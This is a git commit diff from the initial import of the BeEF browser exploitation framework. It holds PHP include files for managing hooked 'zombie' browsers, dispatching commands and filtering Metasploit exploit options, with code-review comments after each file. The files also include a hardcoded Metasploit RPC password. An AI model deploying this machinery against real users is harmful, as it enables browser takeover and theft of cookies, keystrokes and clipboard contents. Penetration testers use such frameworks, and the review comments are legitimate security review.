Initial Import

git-svn-id: https://beef.googlecode.com/svn/trunk@2 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
wade@bindshell.net
2010-01-11 00:54:08 +00:00
parent 11b1c899a5
commit 03ffb4703d
201 changed files with 18853 additions and 0 deletions


@@ -0,0 +1,237 @@
<?php
// Hit/Log tracker with Browser Lookup support.
// Browser Lookup by Geoffrey Sneddon, with some help from Clayton Smith.
// Rest of the script by Jordan S. C. Thompson (Hendee).
// Released under the zlib/libpng license.
// December 15, 2005
// This file's code should either be placed in the file you want it displayed or include it.
// If you include be sure to specify where the log files are in $dir.
// EXAMPLE OUTPUT
// Browser: Internet Explorer
// Browser Version: 6.0
// Operating System: Windows 98
// Internet Service Provider: Juno
// Site Hits: 65,485,455
$dir = "./";
$counterDB = "hits.dat";
$logDB = "log.dat";
$currentPage = "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
function browser($ua)
{
if (preg_match('/bot/i', $ua) || preg_match('/crawl/i', $ua) || preg_match('/yahoo\!/i', $ua))
{
$return['name'] = 'Bot';
$return['version'] = 'Unknown';
}
elseif (preg_match('/opera/i', $ua))
{
preg_match('/Opera(\/| )([0-9\.]+)(u)?(\d+)?/i', $ua, $b);
$return['name'] = 'Opera';
unset($b[0], $b[1]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/msie/i', $ua))
{
preg_match('/MSIE ([0-9\.]+)(b)?/i', $ua, $b);
$return['name'] = 'Internet Explorer';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/omniweb/i', $ua))
{
preg_match('/OmniWeb\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'OmniWeb';
if (isset($b[1]))
$return['version'] = $b[1];
else
$return['version'] = 'Unknown';
}
elseif (preg_match('/icab/i', $ua))
{
preg_match('/iCab\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'iCab';
$return['version'] = $b[1];
}
elseif (preg_match('/Chrome/i', $ua))
{
$return['name'] = 'Chrome';
preg_match('/Chrome\/([0-9\.]+)/i', $ua, $b);
$return['version'] = $b[1];
}
elseif (preg_match('/safari/i', $ua))
{
preg_match('/Safari\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'Safari';
$return['version'] = $b[1];
switch ($return['version'])
{
case '412':
case '412.2':
case '412.2.2':
$return['version'] = '2.0';
break;
case '412.5':
$return['version'] = '2.0.1';
break;
case '416.12':
case '416.13':
$return['version'] = '2.0.2';
break;
case '100':
$return['version'] = '1.1';
break;
case '100.1':
$return['version'] = '1.1.1';
break;
case '125.7':
case '125.8':
$return['version'] = '1.2.2';
break;
case '125.9':
$return['version'] = '1.2.3';
break;
case '125.11':
case '125.12':
$return['version'] = '1.2.4';
break;
case '312':
$return['version'] = '1.3';
break;
case '312.3':
case '312.3.1':
$return['version'] = '1.3.1';
break;
case '85.5':
$return['version'] = '1.0';
break;
case '85.7':
$return['version'] = '1.0.2';
break;
case '85.8':
case '85.8.1':
$return['version'] = '1.0.3';
break;
}
}
elseif (preg_match('/konqueror/i', $ua))
{
preg_match('/Konqueror\/([0-9\.]+)(\-rc)?(\d+)?/i', $ua, $b);
$return['name'] = 'Konqueror';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/Flock/i', $ua))
{
preg_match('/Flock\/([0-9\.]+)(\+)?/i', $ua, $b);
$return['name'] = 'Flock';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/firebird/i', $ua))
{
preg_match('/Firebird\/([0-9\.]+)(\+)?/i', $ua, $b);
$return['name'] = 'Firebird';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/phoenix/i', $ua))
{
preg_match('/Phoenix\/([0-9\.]+)(\+)?/i', $ua, $b);
$return['name'] = 'Phoenix';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/firefox/i', $ua))
{
preg_match('/Firefox\/([0-9\.]+)(\+)?/i', $ua, $b);
$return['name'] = 'Firefox';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/chimera/i', $ua))
{
preg_match('/Chimera\/([0-9\.]+)(a|b)?(\d+)?(\+)?/i', $ua, $b);
$return['name'] = 'Chimera';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/camino/i', $ua))
{
preg_match('/Camino\/([0-9\.]+)(a|b)?(\d+)?(\+)?/i', $ua, $b);
$return['name'] = 'Camino';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/seamonkey/i', $ua))
{
preg_match('/SeaMonkey\/([0-9\.]+)(a|b)?/i', $ua, $b);
$return['name'] = 'SeaMonkey';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/galeon/i', $ua))
{
preg_match('/Galeon\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'Galeon';
$return['version'] = $b[1];
}
elseif (preg_match('/epiphany/i', $ua))
{
preg_match('/Epiphany\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'Epiphany';
$return['version'] = $b[1];
}
elseif (preg_match('/mozilla\/5/i', $ua) || preg_match('/gecko/i', $ua))
{
preg_match('/rv(:| )([0-9\.]+)(a|b)?/i', $ua, $b);
$return['name'] = 'Mozilla';
unset($b[0], $b[1]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/mozilla\/4/i', $ua))
{
preg_match('/Mozilla\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'Netscape';
$return['version'] = $b[1];
}
elseif (preg_match('/lynx/i', $ua))
{
preg_match('/Lynx\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'Lynx';
$return['version'] = $b[1];
}
elseif (preg_match('/links/i', $ua))
{
preg_match('/Links \(([0-9\.]+)(pre)?(\d+)?/i', $ua, $b);
$return['name'] = 'Links';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/curl/i', $ua))
{
preg_match('/curl\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'cURL';
$return['version'] = $b[1];
}
elseif (preg_match('/wget/i', $ua))
{
preg_match('/Wget\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'Wget';
$return['version'] = $b[1];
}
else
{
$return['name'] = 'Unknown';
$return['version'] = 'Unknown';
}
return $return;
}
?>
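Review bot: The branches of browser() that assign `$return['version'] = $b[1]` (iCab, Chrome, Safari, Galeon, Epiphany, Netscape, Lynx, cURL, Wget) never check that the second preg_match() matched, so a User-Agent that contains the keyword but not the versioned token raises an undefined-offset notice and yields a null version; only the OmniWeb branch guards this. The User-Agent is client-controlled, so each of these branches should use the same guard, e.g. `$return['version'] = isset($b[1]) ? $b[1] : 'Unknown';`. Separately, `$currentPage` is assembled from `$_SERVER['HTTP_HOST']` and `$_SERVER['REQUEST_URI']`, both supplied by the request, so any code that later prints or logs it has to encode it for the output context.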


@@ -0,0 +1,24 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("filter.inc.php");
if(!file_exists('../include/config.inc.php')
&& !file_exists('../../include/config.inc.php')
&& !file_exists('../../../include/config.inc.php')) {
$install_url = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
if(valid_url_without_query($install_url)) {
echo "<script>location.href = '" . $install_url . "..'</script>";
echo '<li><a href="..">Configure BeEF</a></li>';
} else {
echo 'Install and configure BeEF first';
}
exit(0);
}
?>
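Review bot: The redirect at `echo "<script>location.href = '" . $install_url . "..'</script>";` places a value built from `$_SERVER['SERVER_NAME']` and `$_SERVER['REQUEST_URI']` inside a JavaScript string, and its only protection is the character allow-list in valid_url(), which lives in another file. Since the target is always the parent directory, a relative redirect avoids reflecting request data at all: `echo "<script>location.href = '..'</script>";` (assuming the page URL ends in a directory path, as the existing concatenation already does). If the absolute URL has to stay, encode it where it is printed with `json_encode($install_url . '..')` rather than relying on the upstream filter. The scheme is also hard-coded to `http://`, which is wrong for an install served over TLS.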

157
include/common.inc.php Normal file

@@ -0,0 +1,157 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("globals.inc.php");
// --[ BEEF_JS_ERROR
function beef_js_error($str) {
echo('<script>alert("' . $str . '")</script>');
}
// ---[ GET_B64_FILE
// returns the contents of a file in base64
function get_b64_file($file) {
$raw = file_get_contents($file);
$result = base64_encode($raw);
return $result;
}
// --[ BEEF_ERROR
function beef_error() {
echo ERROR_GENERIC;
exit;
}
// --[ GET_LOG
// returns the log file
function get_log() {
$raw = file_get_contents(LOG_FILE);
$log_data = "";
$log_data = html_encode_all($raw);
$log_data = convert_10_BR($log_data);
return $log_data;
}
// --[ GET_LOG
// returns the log file
function get_summary_log() {
$raw = file_get_contents(SUMMARY_LOG_FILE);
return $raw;
}
function convert_10_BR($str) {
return preg_replace('/&#10;/', "<br>", $str);
}
// --[ HTML_ENCODE_ALL
// html encodes all characters
function html_encode_all($str) {
$rtnstr = "";
$strlength = strlen($str);
for($i = 0; $i < $strlength; $i++){
$rtnstr .= "&#" . ord($str[$i]) . ";";
}
return $rtnstr;
}
// --[BEEF_LOG
// log an entry to the beef log
function beef_log($summary, $str) {
// below includes session info - for nat'ed browsers
$time_stamp = date("d/m/y H:i:s", time());
$zombie_id = md5(session_id());
// create full log
$log_entry = "[" . $time_stamp . " " . $_SERVER['REMOTE_ADDR'] . "] " . $str;
file_put_contents(LOG_FILE, $log_entry . "\n", FILE_APPEND);
//create summary log
if($summary != "") {
$time_stamp_link = "<a href=\"javascript:change_zombie('" . md5(session_id()) . "')\">" ;
$time_stamp_link .= "[" . $time_stamp . " " . $_SERVER['REMOTE_ADDR'] . "]</a>";
$safe_summary = html_encode_all($summary);
$safe_summary = convert_10_BR($safe_summary);
$log_entry = $time_stamp_link . "<br>" . $safe_summary;
file_start_put_contents(SUMMARY_LOG_FILE, $log_entry . "<br>");
}
}
function file_start_put_contents($file, $contents) {
$temp = tempnam(TMP_DIR, "delme");
touch($temp);
file_put_contents($temp, $contents, FILE_APPEND);
$raw = file_get_contents($file);
file_put_contents($temp, $raw, FILE_APPEND);
unlink($file);
copy($temp, $file);
unlink($temp);
}
if (!function_exists('file_put_contents')) {
define('FILE_APPEND', 1);
function file_put_contents($n, $d, $flag = false) {
$mode = ($flag == FILE_APPEND || strtoupper($flag) == 'FILE_APPEND') ? 'a' : 'w';
$f = @fopen($n, $mode);
if ($f === false) {
return 0;
} else {
if (is_array($d)) $d = implode($d);
$bytes_written = fwrite($f, $d);
fclose($f);
return $bytes_written;
}
}
}
// --[ MODULE_CODE_AND_RESULT_SETUP
// this sets up session details for the return of the results and
// constructs the code
function module_code_and_result_setup($cmd_file) {
// construct file location strings
$zombie_hook_dir = ZOMBIE_TMP_DIR . session_id();
// create a directory for this zombie if it doens't exist
if(!file_exists($zombie_hook_dir)) {
mkdir($zombie_hook_dir);
}
$zombie_hook_cmd_file = $zombie_hook_dir . "/" . CMD_FILENAME;
$zombie_hook_res_file = $zombie_hook_dir . "/" . RES_FILENAME;
$zombie_hook_res_loc_file = $zombie_hook_dir . "/" . RES_LOC_FILENAME;
// set the location of the results file in the session
$result_id = md5(rand());
$_SESSION[$result_id] = $zombie_hook_res_file;
// determine where to put the results
if(file_exists($zombie_hook_res_loc_file)) {
$res_loc_arr = file($zombie_hook_res_loc_file);
$_SESSION[$result_id] = MODULE_TMP_DIR . $res_loc_arr[0];
$_SESSION['append'] = 1;
unlink($zombie_hook_res_loc_file);
} else {
$_SESSION[$result_id] = $zombie_hook_res_file;
$_SESSION['append'] = 0;
}
// get the javascript command file
$cmd_file_content = file_get_contents($cmd_file);
// return javascript string to set result_id
$js_result_id_code ="var result_id = '$result_id';\n";
return $js_result_id_code . $cmd_file_content;
}
?>
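Review bot: beef_js_error() concatenates `$str` straight into a `<script>` block, so any caller that passes request-derived text gets it executed as script in the operator's console page; the callers are not in this file, so encode here instead of trusting them: `echo '<script>alert(' . json_encode($str, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT) . ')</script>';`. In module_code_and_result_setup(), `$result_id = md5(rand());` becomes the session key that names where results are written, and `rand()` is not a cryptographic generator, so the identifier should come from a CSPRNG (e.g. `bin2hex(random_bytes(16))` on current PHP). file_start_put_contents() does unlink-then-copy with no lock, so two concurrent beef_log() calls can lose summary-log entries; writing the temp file and `rename()`-ing it over the target while holding `flock()` closes that window.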

26
include/filter.inc.php Normal file

@@ -0,0 +1,26 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
function valid_ip($ip) {
return filter_var($ip, FILTER_VALIDATE_IP);
}
function valid_port($port) {
$int_options = array("options"=>array("min_range"=>0, "max_range"=>65535));
return filter_var($port, FILTER_VALIDATE_INT, $int_options);
}
function valid_url($url) {
if( preg_match("/\.\./", $url) ) return FALSE;
if( ! preg_match("/^[a-zA-Z0-9\._:\/]*$/", $url) ) return FALSE;
return filter_var($url, FILTER_VALIDATE_URL, FILTER_FLAG_SCHEME_REQUIRED);
}
function valid_url_without_query($url) {
if(filter_var($url, FILTER_FLAG_QUERY_REQUIRED)) return FALSE;
return valid_url($url);
}
?>
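Review bot: valid_url_without_query() passes `FILTER_FLAG_QUERY_REQUIRED` as the second argument of filter_var(), which is the filter id and not the flags, so the call never runs a URL check and the "has a query string" test cannot succeed. The intended call is `if(filter_var($url, FILTER_VALIDATE_URL, FILTER_FLAG_QUERY_REQUIRED)) return FALSE;`. Today the function is rescued only by valid_url()'s allow-list, which contains no `?`; that dependency deserves a comment if the check is left as is. valid_ip() and valid_port() also return the filtered value rather than a boolean, so `valid_port("0")` returns `0` and callers written as `if(!valid_port(...))` reject a port that `min_range` allows; comparing with `!== false` fixes that.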

112
include/globals.inc.php Normal file

@@ -0,0 +1,112 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
// if check_install.inc.php works this should exist
require_once("check_install.inc.php");
require_once("config.inc.php");
// files and directories
// module
define('MODULE_DIR', BASE_DIR . "modules/");
define('MODULE_STANDARD_SUBDIR', "standard");
define('MODULE_BROWSER_SUBDIR', "browser");
define('MODULE_NETWORK_SUBDIR', "network");
define('MODULE_INTERPROTOCOL_SUBDIR', "interprotocol");
define('MODULE_STANDARD_DIR', MODULE_DIR . MODULE_STANDARD_SUBDIR . "/");
define('MODULE_BROWSER_DIR', MODULE_DIR . MODULE_BROWSER_SUBDIR . "/");
define('MODULE_NETWORK_DIR', MODULE_DIR . MODULE_NETWORK_SUBDIR . "/");
define('MODULE_INTERPROTOCOL_DIR', MODULE_DIR . MODULE_INTERPROTOCOL_SUBDIR . "/");
// temp
define('TMP_DIR', BASE_DIR . "cache/");
define('ZOMBIE_TMP_DIR', TMP_DIR . "zombies/");
define('AUTORUN_TMP_DIR', TMP_DIR . "autorun/");
define('MODULE_TMP_DIR', TMP_DIR . "modules/");
define('AUTORUN_TMP_FILENAME', "autorun.js");
// other
define('JAVASCRIPT_DIR', BASE_DIR . "js/");
define('CMD_FILE', TMP_DIR . "cmd.js");
define('CMD_FILE_BAK', TMP_DIR . "cmd.js.bak");
define('CMD_RESULT_FILE', TMP_DIR . "cmd.res");
define('CMD_RESULT_FILE_BAK', TMP_DIR . "cmd.res.bak");
define('HEARTBEAT_FILE', TMP_DIR . "heartbeat");
define('HEARTBEAT_FILENAME', "heartbeat");
define('KEYLOG_FILENAME', "keylog");
define('SCREEN_FILENAME', "screen");
define('HTML_FILENAME', "content.html");
define('COOKIE_FILENAME', "cookie.txt");
define('LOC_FILENAME', "loc.txt");
define('RES_LOC_FILENAME', "res_loc");
define('CLIPBOARD_FILENAME', "clipboard.txt");
define('CMD_FILENAME', "cmd");
define('RES_FILENAME', "result");
define('MODULE_NAME_FILENAME', "name.txt");
define('BASE64_JAVASCRIPT_FILE', JAVASCRIPT_DIR . "base64.js");
define('BASE64REPLACE_JAVASCRIPT_FILE', JAVASCRIPT_DIR . "base64replace.js");
define('HEARTBEAT_TIME', "10000");
define('HEARTBEAT_FREQUENCY', 5);
define('SUMMARY_LOG_HEARTBEAT_FREQUENCY', 3);
// session
define('SESSION_NAME', "BeEFSession");
// strings
define('DNA_STRING', "Data not available");
define('ERROR_GENERIC', "Error ");
// zombies (sidebar)
define('ZOMBIE_NONE', '<li><a href="#">None Connected</a></li>');
define('ZOMBIE_IMG_ATT', ' width="12" height="12" align="top" border="0"');
define('ZOMBIE_UA_IMG_TAG', '<img src="../images/AGENT"' . ZOMBIE_IMG_ATT . '>');
define('ZOMBIE_OS_IMG_TAG', '<img src="../images/OS"' . ZOMBIE_IMG_ATT . '>');
define('ZOMBIE_IP_TAG', '<div id="zombietext">IPADDRESS</div>');
define('ZOMBIE_CHANGE_HREF', '<a href="javascript:change_zombie(\'ZOMBIE\')">');
define('ZOMBIE_NOT_SEL_TAG', '<div id=\'zombies\'>');
define('ZOMBIE_SEL_TAG', '<div id=\'zombiessel\'>');
define('ZOMBIE_LINK', ZOMBIE_NOT_SEL_TAG . ZOMBIE_CHANGE_HREF . ZOMBIE_UA_IMG_TAG .
ZOMBIE_OS_IMG_TAG . ZOMBIE_IP_TAG . '</a></div>');
define('ZOMBIE_LINK_SEL', ZOMBIE_SEL_TAG . ZOMBIE_CHANGE_HREF . ZOMBIE_UA_IMG_TAG .
ZOMBIE_OS_IMG_TAG . ZOMBIE_IP_TAG . '</a></div>');
define('MODULE_BUTTON_HTML', '<input class="button" type="button" value="NAME" ' .
'onClick="change_module(\'../modules/PATH/\')"/>' . "\n");
define('MODULE_MENU_ITEM_HTML', '<li><a href="#" onClick="change_module(\'PATH\')">NAME</a></li>');
// install
define('INSTALL_WARNING_TEXT', 'ERROR: BeEF may not have been installed correctly.Edit the "' .
'define(\'BASE_DIR\', "/var/.../htdocs/beef/");' .
' line of the \'globals.inc.php\' file in the \'include\' dirrctory and point' .
' this value at the BeEf install directory.');
define('INSTALL_WARNING', '<font size="4" color="red">' . INSTALL_WARNING_TEXT . '</font>');
// agents
define('AGENT_UNKNOWN_IMG', "unknown.png");
define('AGENT_FIREFOX_UA_STR', "Firefox");
define('AGENT_FIREFOX_IMG', "firefox.png");
define('AGENT_MOZILLA_UA_STR', "Mozilla");
define('AGENT_MOZILLA_IMG', "mozilla.png");
define('AGENT_IE_UA_STR', "Internet Explorer");
define('AGENT_IE_IMG', "msie.png");
define('AGENT_SAFARI_UA_STR', "Safari");
define('AGENT_SAFARI_IMG', "safari.png");
define('AGENT_KONQ_UA_STR', "Konqueror");
define('AGENT_KONQ_IMG', "konqueror.png");
define('AGENT_CHROME_UA_STR', "Chrome");
define('AGENT_CHROME_IMG', "chrome.png");
// os'es
define('OS_UNKNOWN_IMG', "unknown.png");
define('OS_WINDOWS_UA_STR', "Windows");
define('OS_WINDOWS_IMG', "win.png");
define('OS_LINUX_UA_STR', "Linux");
define('OS_LINUX_IMG', "linux.png");
define('OS_MAC_UA_STR', "Mac");
define('OS_MAC_IMG', "mac.png");
?>
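Review bot: INSTALL_WARNING_TEXT tells the operator to edit the `define('BASE_DIR', ...)` line of 'globals.inc.php', but this file never defines BASE_DIR; it only consumes it after `require_once("config.inc.php")`, so the constant presumably lives there. The message should name the file that actually holds the setting, and the typos "dirrctory" and "correctly.Edit" can be fixed in the same change. HEARTBEAT_NOP (used in hook.inc.php) and MODULE_SYMMETRIC_DIR (used in ui_module.inc.php) are not defined here either, so unless config.inc.php provides them those call sites fail.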

65
include/hook.inc.php Normal file

@@ -0,0 +1,65 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../include/globals.inc.php");
require_once("../include/browserdetection.inc.php");
// --[ EXTRACT_OS
function extract_os() {
$user_parts = explode(";", $_SERVER['HTTP_USER_AGENT']);
$os = trim($user_parts[2]);
$os = str_replace(')', '', $os);
return $os;
}
// ---[ GET_UA_DETAILS
function get_ua_details() {
$ip = $_SERVER['REMOTE_ADDR'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$browser = browser($_SERVER['HTTP_USER_AGENT']);
$os = extract_os();
// return the collected useragent details
return $ip . "\n" .
$browser['name'] . "\n" .
$browser['version'] . "\n" .
$os . "\n" .
$agent;
}
// ---[ REGISTER_HEARTBEAT
function register_heartbeat($status, $result) {
// construct file location strings
$zombie_hook_dir = ZOMBIE_TMP_DIR . session_id();
$zombie_hook_heartbeat_file = $zombie_hook_dir . "/" . HEARTBEAT_FILENAME;
$zombie_hook_cmd_file = $zombie_hook_dir . "/" . CMD_FILENAME;
$zombie_hook_res_file = $zombie_hook_dir . "/" . RES_FILENAME;
// create a directory for this zombie if it doens't exist
if(!file_exists($zombie_hook_dir)) {
mkdir($zombie_hook_dir);
}
// heartbeat
// write the heartbeat details to file
file_put_contents($zombie_hook_heartbeat_file, get_ua_details());
// if there is a result write it to file
if($status != HEARTBEAT_NOP) {
file_put_contents($zombie_hook_res_file, $result);
}
if(!file_exists($zombie_hook_cmd_file)) { return 0; }
// get the command from $zombie_hook_cmd_file
$lines = file($zombie_hook_cmd_file);
unlink($zombie_hook_cmd_file);
return join("\n", $lines);
}
?>
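Review bot: extract_os() indexes `$user_parts[2]` without checking that the User-Agent has three `;`-separated parts, and neither it nor get_ua_details() checks that `$_SERVER['HTTP_USER_AGENT']` is set, so command-line clients and bots raise notices and record an empty OS line. A guard such as `$os = isset($user_parts[2]) ? trim($user_parts[2]) : DNA_STRING;` keeps the heartbeat record well formed. The heartbeat and result files written by register_heartbeat() store the raw User-Agent and `$result` exactly as received, so every reader must encode them for its output context; a comment above `file_put_contents($zombie_hook_heartbeat_file, get_ua_details());` should say so. A format check on `session_id()` before it is used as a directory name under ZOMBIE_TMP_DIR would also be prudent, since the value originates from a client cookie.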

7
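--- a/include/msf.inc.php
+++ b/include/msf.inc.php
@@ -0,0 +1,7 @@
+<?php
+define('MSF_HOST', '127.0.0.1');
+define('MSF_PORT', '55553');
+define('MSF_USER', 'msf');
+define('MSF_PASS', 'BeEFMSFPass');
+define('MSF_BASE_URL', 'http://192.168.1.235');
+?>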
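Review bot: `define('MSF_PASS', 'BeEFMSFPass');` commits a working credential for the Metasploit RPC service, so every install that keeps the default shares a publicly known password. Ship a placeholder instead and have the installer refuse to continue until it is changed, or read the value from a file kept outside version control and outside the web root. `MSF_BASE_URL` is pinned to `http://192.168.1.235`, which looks like a developer's lab address and will not match `MSF_HOST` on other installs; the address and the plain-HTTP scheme should both be configuration, not constants.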

134
include/msf_filter.inc.php Normal file

@@ -0,0 +1,134 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("filter.inc.php");
function get_and_filter_exploit() {
$exploit = $_GET["exploit"];
if(strlen($exploit) > 50) {
return FALSE;
}
if( !( preg_match("/multi\/browser\/[a-z_]+/", $exploit) ||
preg_match("/osx\/browser\/[a-z_]+/", $exploit) ||
preg_match("/windows\/browser\/[a-z_]+/", $exploit)) ) {
return FALSE;
}
return $exploit;
}
function get_and_filter_payload() {
$payload = $_GET["payload"];
if(strlen($payload) > 50) {
return FALSE;
}
if( !preg_match("/[a-z_]+\/[a-z_]+[\/[a-z_]+]{0,1}/", $payload) ) {
return FALSE;
}
return $payload;
}
function valid_exitfunc($func) {
if ( ($func == "seh") || ($func == "thread") || ($func == "process") ) {
return true;
}
return true;
}
function valid_srvhost($ip) {
return valid_ip($ip);
}
function valid_srvport($port) {
return valid_port($port);
}
function valid_urlpath($path) {
if( ! preg_match("/^[a-zA-Z0-9\/\.]*$/", $path) ) return FALSE;
return TRUE;
}
function get_and_filter_smb_capture_options() {
$options = array();
// SRVHOST
if(!$_GET["SRVHOST"]) return FALSE;
if(!valid_ip($_GET["SRVHOST"])) return FALSE;
$options["SRVHOST"] = $_GET["SRVHOST"];
// SRVPORT
if(!$_GET["SRVPORT"]) return FALSE;
if(!valid_port($_GET["SRVPORT"])) return FALSE;
$options["SRVPORT"] = $_GET["SRVPORT"];
// URIPATH
if($_GET["URIPATH"]) {
if(!valid_urlpath($_GET["URIPATH"])) return FALSE;
$options["URIPATH"] = $_GET["URIPATH"];
}
return $options;
}
function get_and_filter_module_options() {
$options = array();
// PAYLOAD
$options["PAYLOAD"] = get_and_filter_payload();
// SRVHOST
if(!$_GET["SRVHOST"]) return FALSE;
if(!valid_ip($_GET["SRVHOST"])) return FALSE;
$options["SRVHOST"] = $_GET["SRVHOST"];
// SRVPORT
if(!$_GET["SRVPORT"]) return FALSE;
if(!valid_port($_GET["SRVPORT"])) return FALSE;
$options["SRVPORT"] = $_GET["SRVPORT"];
// LPORT
if($_GET["LPORT"]) {
if(!valid_port($_GET["LPORT"])) return FALSE;
$options["LPORT"] = $_GET["LPORT"];
}
// RHOST
if($_GET["RHOST"]) {
if(!valid_ip($_GET["RHOST"])) return FALSE;
$options["RHOST"] = $_GET["RHOST"];
}
// LHOST
if($_GET["LHOST"]) {
if(!valid_ip($_GET["LHOST"])) return FALSE;
$options["LHOST"] = $_GET["LHOST"];
}
// URIPATH
if($_GET["URIPATH"]) {
if(!valid_urlpath($_GET["URIPATH"])) return FALSE;
$options["URIPATH"] = $_GET["URIPATH"];
}
// EXITFUNC
if($_GET["EXITFUNC"]) {
if(!valid_exitfunc($_GET["EXITFUNC"])) return FALSE;
$options["EXITFUNC"] = $_GET["EXITFUNC"];
}
return $options;
}
?>
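Review bot: valid_exitfunc() returns `true` on both paths, so the EXITFUNC check in get_and_filter_module_options() never rejects anything; the final statement should be `return false;`. The patterns in get_and_filter_exploit() are unanchored, so a string of up to 50 characters that merely contains a matching fragment passes and is returned whole; anchor them, e.g. `preg_match("/^(multi|osx|windows)\/browser\/[a-z_]+$/", $exploit)`. The payload pattern has the same problem, and its `[\/[a-z_]+]{0,1}` is parsed as a character class followed by an optional literal `]`, not as an optional third path segment. get_and_filter_module_options() also stores the result of get_and_filter_payload() without testing it for FALSE, and every `$_GET[...]` read lacks an isset() guard.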

96
include/ui_module.inc.php Normal file

@@ -0,0 +1,96 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
// ---[ GET_MODULE_BUTTONS_HTML
// usage: get_module_button_html(button name/lable, browser request path)
function get_module_button_html($name, $path) {
$result = MODULE_BUTTON_HTML;
$result = str_replace("NAME", $name, $result); // button name
$result = str_replace("PATH", $path, $result); // path to module
return $result;
}
function get_module_menu_item_html($name, $path) {
$result = MODULE_MENU_ITEM_HTML;
$result = str_replace("NAME", $name, $result); // button name
$result = str_replace("PATH", $path, $result); // path to module
return $result;
}
// --[ GET_STANDARD_MODULE_MENU
function get_standard_module_menu() {
$menu_str .= get_module_menu(MODULE_STANDARD_DIR, MODULE_STANDARD_SUBDIR);
return $menu_str;
}
// --[ GET_BROWSER_MODULE_MENU
function get_browser_module_menu() {
$menu_str .= get_module_menu(MODULE_BROWSER_DIR, MODULE_BROWSER_SUBDIR);
return $menu_str;
}
// --[ GET_BROWSER_MODULE_MENU
function get_network_module_menu() {
$menu_str .= get_module_menu(MODULE_NETWORK_DIR, MODULE_NETWORK_SUBDIR);
return $menu_str;
}
// --[ GET_INTERPROTOCOL_MODULE_MENU
function get_interprotocol_module_menu() {
$menu_str .= get_module_menu(MODULE_INTERPROTOCOL_DIR, MODULE_INTERPROTOCOL_SUBDIR);
return $menu_str;
}
// ---[ GET_MODULE_MENU
function get_module_menu($module_dir, $module_subdir) {
$result = "";
$wildcard = $module_dir . '*';
// iterate through the module directories
foreach (glob($wildcard) as $dirname) {
// get module name from file
$name = file_get_contents($dirname . '/' . MODULE_NAME_FILENAME);
// create html module buttons
$result .= get_module_menu_item_html(trim($name), "/beef/modules/". $module_subdir . "/" . basename($dirname));
}
return $result;
}
// ---[ GET_ALL_MODULE_BUTTONS_HTML
function get_all_module_menu_items_html() {
$result = "";
$wildcard = MODULE_SYMMETRIC_DIR . '*';
// iterate through the module directories
foreach (glob($wildcard) as $dirname) {
// get module name from file
$name = join("\n", file($dirname . '/' . MODULE_NAME_FILENAME));
// create html module buttons
$result .= get_module_menu_item_html(trim($name), "/beef/modules/symmetric/" . basename($dirname));
}
return $result;
}
// ---[ GET_ALL_MODULE_BUTTONS_HTML
function get_all_module_buttons_html() {
$result = "";
$wildcard = MODULE_SYMMETRIC_DIR . '*';
// iterate through the module directories
foreach (glob($wildcard) as $dirname) {
// get module name from file
$name = join("<br>", file($dirname . '/' . MODULE_NAME_FILENAME));
// create html module buttons
$result .= get_module_button_html(trim($name), "/symmetric/" . basename($dirname));
}
return $result;
}
?>
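Review bot: get_all_module_menu_items_html() and get_all_module_buttons_html() glob on `MODULE_SYMMETRIC_DIR`, which globals.inc.php in this commit does not define (it defines only the STANDARD, BROWSER, NETWORK and INTERPROTOCOL directories); unless config.inc.php supplies it, these two functions glob a bogus path or fail outright on current PHP. The four get_*_module_menu() wrappers append with `$menu_str .=` to a variable that was never initialised; `return get_module_menu(MODULE_STANDARD_DIR, MODULE_STANDARD_SUBDIR);` and its siblings are equivalent without the notice. The text read from each module's name file is substituted into MODULE_MENU_ITEM_HTML and MODULE_BUTTON_HTML without `htmlspecialchars()`, so a name file containing markup is rendered as markup in the console.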

230
include/ui_zombie.inc.php Normal file

@@ -0,0 +1,230 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("globals.inc.php");
require_once("browserdetection.inc.php");
require_once("common.inc.php");
// ---[ GET_ZOMBIE_OS
// the output of this function must be escaped
function get_zombie_os($zombie_id) {
